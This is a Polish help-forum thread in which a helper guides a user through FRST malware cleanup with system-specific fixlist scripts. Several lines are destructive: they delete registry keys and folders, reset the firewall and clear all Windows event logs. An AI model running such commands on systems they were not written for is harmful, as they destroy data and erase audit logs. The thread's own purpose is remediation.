Zakładam że urządzenie nadal jest widoczne pod literą F:, w przeciwnym wypadku skrypt naprawy nie zadziała. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: C:\*.scr C:\Autorun.inf C:\Thumbs.com F:\*.scr F:\Autorun.inf F:\Thumbs* Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Tym razem naprawa powinna wykonać się szybko i bez restartu. Powstanie kolejny plik fixlog.txt w folderze z którego uruchamiasz FRST - pokaż go.

Nie, nie należy ponawiać opcji Napraw, to jednorazowe zadanie i nie wykona ponownie tego samego. Logi z FRST wykazują, że naprawa się wykonała, ale chcę potwierdzić to na 100% i obejrzeć szczegóły przeprowadzonej naprawy, a dane są w pliku Fixlog.txt. Ten plik musi być u Ciebie na dysku. FRST uruchamiałeś z folderu Pobrane (C:\Users\KAZI\Downloads), więc plik powinien być właśnie tam. Wejdź do tego folderu i poszukaj pliku Fixlog.txt.

Plik Fixlog automatycznie jest tworzony podczas wykonywania opcji Napraw. Tę opcję już użyłeś (nie próbuj jej używać ponownie!), więc plik powinien być w folderze Pobrane, bo stamtąd był uruchamiany FRST. Dostarcz go. A jeśli chodzi o logi z opcji Skanuj, to mówiłam że tym razem bez Shortcut, czyli dwa logi miały powstać (FRST.txt + Addition.txt) i te są załączone OK.

Jak napisałam: Czyli ten plik jest w folderze Pobrane.

Komunikat "Surabaya" wynika ze szkodliwej modyfikacji wartości LegalNotice. Natomiast foldery System Volume Information (Przywracanie systemu) i $Recycle.Bin (rzeczywisty folder Kosza, na Pulpicie to tylko wirtualny skrót) to poprawne foldery Windows które były od momentu instalacji, a nagle się pokazały, gdyż została przestawiona opcja Ukryj chronione pliki systemu operacyjnego. Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj: Adobe Flash Player 22 NPAPI (niepotrzebny, w systemie brak Firefox) oraz Java 8 Update 91 (stara wersja). 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKLM\...\Winlogon: [LegalNoticeCaption] 81u3f4nt45y - 24.01.2007 - Surabaya HKLM\...\Winlogon: [LegalNoticeText] Surabaya in my birthday Don't kill me, i'm just send message from your computer Terima kasih telah menemaniku walaupun hanya sesaat, tapi bagiku sangat berarti Maafkan jika kebahagiaan yang kuminta adalah teman sepanjang hidupku Seharusnya aku mengerti bahwa keberadaanku bukanlah disisimu, hanyalah lamunan dalam sesal Untuk kekasih yang tak kan pernah kumiliki 3r1k1m0 HKU\S-1-5-21-1671606494-1044672718-3766306234-1000\...\Run: [World of Tanks] => "C:\Games\World_of_Tanks\WargamingGameUpdater.exe" HKU\S-1-5-21-1671606494-1044672718-3766306234-1000\...\Run: [blueStacks Agent] => C:\Program Files\Bluestacks\HD-Agent.exe HKU\S-1-5-21-1671606494-1044672718-3766306234-1000\...\Run: [ALLUpdate] => "C:\Program Files\ALLPlayer\ALLUpdate.exe" "sleep" HKU\S-1-5-21-1671606494-1044672718-3766306234-1000\...\Run: [Napisy24Update] => "C:\Program Files\Napisy24\Napisy24Update.exe" "sleep" Startup: C:\Users\KAZI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Online.com [2013-02-14] () Startup: C:\Users\KAZI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe update.com [2013-02-14] () HKLM\...\scrfile\shell\open\command: %1 HKU\S-1-5-21-1671606494-1044672718-3766306234-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.gazeta.pl/0,0.html?p=190 CHR HomePage: Default -> hxxp://www.gazeta.pl/0,0.html?p=190 CHR StartupUrls: Default -> "hxxp://www.gazeta.pl/0,0.html?p=190" ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku Task: {2E30A5E3-105F-4019-AA46-5D6DE366E773} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-09-10] (AVAST Software) Task: {D4C0B434-28E0-4BAF-8A58-EEA266A1E299} - System32\Tasks\{E27543BE-AD41-4D4A-9BBB-749028E94C6E} => C:\Users\KAZI\Desktop\Let's Play\GAME OF THE YEAR 420 BLAZE IT.exe DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVAST Software DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\mozilla.org DeleteKey: HKLM\SOFTWARE\MozillaPlugins C:\Program Files\Common Files\AV\avast! Antivirus C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Goat Simulator C:\Users\KAZI\AppData\Local\Mozilla C:\Users\KAZI\AppData\Roaming\Mozilla C:\Users\KAZI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam C:\Users\KAZI\AppData\Roaming\04d977f7136142501f27f91796e178a32 C:\Windows\System32\Tasks\AVAST Software cmd: netsh advfirewall reset Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

Jeśli na komputerze jest wersja 5.33, to niezależnie od tego czy klucz infekcji został utworzony w rejestrze czy nie, pliki wykonywalne mają wstawiony szkodliwy kod (po prostu mógł się nie zaktywować) i należy program kompletnie odinstalować, następnie pobrać najnowszą wersję. O ile ktoś oczywiście ma nadal zaufanie do tego programu...